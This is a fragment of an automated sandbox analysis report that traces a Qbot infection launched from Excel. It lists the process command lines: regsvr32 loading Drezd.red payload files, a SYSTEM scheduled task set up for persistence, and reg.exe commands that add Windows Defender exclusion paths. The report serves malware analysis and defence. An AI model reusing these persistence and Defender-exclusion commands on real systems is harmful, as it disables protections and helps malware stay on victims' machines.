00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL;a! p| .text `.edatap @@.data 0@.dataTP$@.rdatatH@.rsrc @@P0PPPHPP


                                    Code Manipulations

                                    Statistics

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Start time:10:21:18
                                    Start date:28/09/2021
                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    Wow64 process (32bit):false
                                    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                    Imagebase:0x13fa70000
                                    File size:28253536 bytes
                                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate

                                    General

                                    Start time:10:23:39
                                    Start date:28/09/2021
                                    Path:C:\Windows\System32\regsvr32.exe
                                    Wow64 process (32bit):false
                                    Commandline:regsvr32 -silent ..\Drezd.red
                                    Imagebase:0xff280000
                                    File size:19456 bytes
                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Start time:10:23:39
                                    Start date:28/09/2021
                                    Path:C:\Windows\SysWOW64\regsvr32.exe
                                    Wow64 process (32bit):true
                                    Commandline: -silent ..\Drezd.red
                                    Imagebase:0xa20000
                                    File size:14848 bytes
                                    MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000006.00000002.715078031.0000000010001000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000006.00000002.713427364.0000000000890000.00000004.00000001.sdmp, Author: Joe Security
                                    Reputation:moderate

                                    General

                                    Start time:10:23:41
                                    Start date:28/09/2021
                                    Path:C:\Windows\SysWOW64\explorer.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\explorer.exe
                                    Imagebase:0x150000
                                    File size:2972672 bytes
                                    MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000007.00000002.978062440.00000000000E0000.00000040.00020000.sdmp, Author: Joe Security
                                    Reputation:high

                                    General

                                    Start time:10:23:43
                                    Start date:28/09/2021
                                    Path:C:\Windows\System32\regsvr32.exe
                                    Wow64 process (32bit):false
                                    Commandline:regsvr32 -silent ..\Drezd1.red
                                    Imagebase:0xff280000
                                    File size:19456 bytes
                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Start time:10:23:43
                                    Start date:28/09/2021
                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                    Wow64 process (32bit):true
                                    Commandline:'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn uwqvoal /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 10:25 /ET 10:37
                                    Imagebase:0xbc0000
                                    File size:179712 bytes
                                    MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Start time:10:23:43
                                    Start date:28/09/2021
                                    Path:C:\Windows\System32\regsvr32.exe
                                    Wow64 process (32bit):false
                                    Commandline:regsvr32 -silent ..\Drezd2.red
                                    Imagebase:0xff280000
                                    File size:19456 bytes
                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Start time:10:23:45
                                    Start date:28/09/2021
                                    Path:C:\Windows\System32\regsvr32.exe
                                    Wow64 process (32bit):false
                                    Commandline:regsvr32.exe -s 'C:\Users\user\Drezd.red'
                                    Imagebase:0xff860000
                                    File size:19456 bytes
                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Start time:10:23:45
                                    Start date:28/09/2021
                                    Path:C:\Windows\SysWOW64\regsvr32.exe
                                    Wow64 process (32bit):true
                                    Commandline: -s 'C:\Users\user\Drezd.red'
                                    Imagebase:0x7e0000
                                    File size:14848 bytes
                                    MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000000D.00000002.727158282.0000000010001000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000000D.00000002.725678165.0000000000210000.00000004.00000001.sdmp, Author: Joe Security
                                    Reputation:moderate

                                    General

                                    Start time:10:23:47
                                    Start date:28/09/2021
                                    Path:C:\Windows\SysWOW64\explorer.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\explorer.exe
                                    Imagebase:0x150000
                                    File size:2972672 bytes
                                    MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000000E.00000002.978045308.00000000000C0000.00000040.00020000.sdmp, Author: Joe Security
                                    Reputation:high

                                    General

                                    Start time:10:23:49
                                    Start date:28/09/2021
                                    Path:C:\Windows\System32\reg.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Imqocbuplg' /d '0'
                                    Imagebase:0xfff00000
                                    File size:74752 bytes
                                    MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    General

                                    Start time:10:23:50
                                    Start date:28/09/2021
                                    Path:C:\Windows\System32\reg.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Iaoaukbfna' /d '0'
                                    Imagebase:0xffad0000
                                    File size:74752 bytes
                                    MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    General

                                    Start time:10:25:00
                                    Start date:28/09/2021
                                    Path:C:\Windows\System32\regsvr32.exe
                                    Wow64 process (32bit):false
                                    Commandline:regsvr32.exe -s 'C:\Users\user\Drezd.red'
                                    Imagebase:0xff8c0000
                                    File size:19456 bytes
                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    General

                                    Start time:10:25:00
                                    Start date:28/09/2021
                                    Path:C:\Windows\SysWOW64\regsvr32.exe
                                    Wow64 process (32bit):true
                                    Commandline: -s 'C:\Users\user\Drezd.red'
                                    Imagebase:0x620000
                                    File size:14848 bytes
                                    MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Disassembly

                                    Code Analysis

                                    Reset < >